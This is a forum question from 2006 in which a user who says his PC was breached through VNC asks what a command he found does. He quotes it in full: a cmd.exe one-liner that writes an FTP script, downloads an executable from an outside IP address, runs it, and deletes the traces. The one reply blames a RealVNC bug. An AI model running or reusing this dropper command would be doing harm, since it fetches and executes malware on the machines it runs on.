Still celebrating National IT Professionals Day with 3 months of free Premium Membership. Use Code ITDAY17

x
?
Solved

I got hacked. Found this command,

Posted on 2006-11-09
1
Medium Priority
?
286 Views
Last Modified: 2010-03-05
I was trouble shooting a time out issue with my internet connection.  During this process I disconnected my switch, then I took my router of the mix.  At this point , my PC was connected directly to my DSL modem.  After 15 minutes past I walked away from my pc for 2 minutes.  I came back to find my VNC icon Black, which means someon was connected, and my Symantec Auto Protect box up on the screen.  I immediatly closed the VNC session.  I then went to run a netstat to see if someone was connected and noticed this string in the command window.

cmd.exe /c del i&echo open 66.16.176.238 12680 > i&echo user 1 1 >> i &echo get 357.exe >> i &echo quit >> i &ftp -n -s:i &357.exe&del i&exit

That same IP address was the ip address that connected to my computer via VNC.  I found it on the event viewer.
I then checked the symantec log and it shows that it blocked the w32.spybot.worm.  Here is what I am guessing.
This bunghole connected to my machine, someone how got into my VNC, and attempted to download a virus, but Norton caught it.

Can anyone tell me for sure what the above command does?
0
Comment
Question by:steveLaMi
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
1 Comment
 
LVL 47

Accepted Solution

by:
rpggamergirl earned 2000 total points
ID: 17910951
There are 2 or 3 questions already with similar issues and theirs were caused by the RealVNC bug of some version.

Here's one of the question I found:
http://www.experts-exchange.com/Operating_Systems/WinXP/Q_22051676.html#17903231
0

Featured Post

Technology Partners: We Want Your Opinion!

We value your feedback.

Take our survey and automatically be enter to win anyone of the following:
Yeti Cooler, Amazon eGift Card, and Movie eGift Card!

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

A look at what happened in the Verizon cloud breach.
Check out what's been happening in the Experts Exchange community.
Email security requires an ever evolving service that stays up to date with counter-evolving threats. The Email Laundry perform Research and Development to ensure their email security service evolves faster than cyber criminals. We apply our Threat…
Nobody understands Phishing better than an anti-spam company. That’s why we are providing Phishing Awareness Training to our customers. According to a report by Verizon, only 3% of targeted users report malicious emails to management. With compan…

715 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question